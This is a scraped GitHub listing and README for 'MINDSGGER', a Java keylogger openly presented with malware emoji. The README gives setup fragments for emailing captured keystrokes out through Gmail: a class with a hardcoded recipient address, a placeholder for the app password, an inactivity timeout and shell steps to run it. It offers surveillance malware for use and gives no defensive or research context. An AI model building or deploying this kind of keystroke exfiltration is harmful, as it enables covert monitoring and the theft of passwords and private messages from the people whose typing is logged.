https://github.com/pineberrycode/mindsgger
[🦠, 👾] Keylogger
https://github.com/pineberrycode/mindsgger
gmail java keylogger lombok-maven shell
Last synced: 11 months ago
JSON representation
[🦠, 👾] Keylogger
- Host: GitHub
- URL: https://github.com/pineberrycode/mindsgger
- Owner: PineberryCode
- License: mit
- Created: 2023-08-08T02:05:49.000Z (over 2 years ago)
- Default Branch: dev
- Last Pushed: 2024-02-03T20:53:55.000Z (about 2 years ago)
- Last Synced: 2024-02-03T21:21:28.631Z (about 2 years ago)
- Topics: gmail, java, keylogger, lombok-maven, shell
- Language: Java
- Homepage:
- Size: 34.2 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# MINDSGGER
This is an app that provides information about the activities of a device (specifically the keyboard).
Pre-requisite:
- Create an App Gmail password
> [!NOTE]
> Set up the **INACTIVITY_TIMEOUT** value to your preference: [/src/main/java/my/model/Person.java](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/model/Person.java)
```JAVA
/*...*/
// Variable to store the time in milliseconds.
protected long INACTIVITY_TIMEOUT = 1 * 3600 * 1000; // One hour
/*...*/
```
> [!IMPORTANT]
> Set up the input email (app gmail): [/src/main/java/my/controller/GmailFunctions.java](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/controller/GmailFunctions.java)
```JAVA
/*...*/
public class GmailFunctions extends TXT {
Gmail gmail;
public GmailFunctions () {
gmail = new Gmail();
}
private void bodyEmail () throws AddressException, MessagingException {
gmail.setEmailTo("mindlunnyfalse@gmail.com"); // Set up => mindlunnyfalse@gmail.com
/*...*/
```
> [!IMPORTANT]
> Remember to add a file that contains your App Gmail password in this route: [/src/main/java/my/key](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/key)
```JAVA
package my.key;
public class Param {
protected String passwordGMAILApp = "[Your App Gmail password]";
}
```
## Steps just for Linux users:
###### 1. Enable execute permission
```SHELL
chmod +x run.bash
```
###### 2. Reload (Optional)
```SHELL
source ./run.bash
```
###### 3. Run
```SHELL
./run.bash
```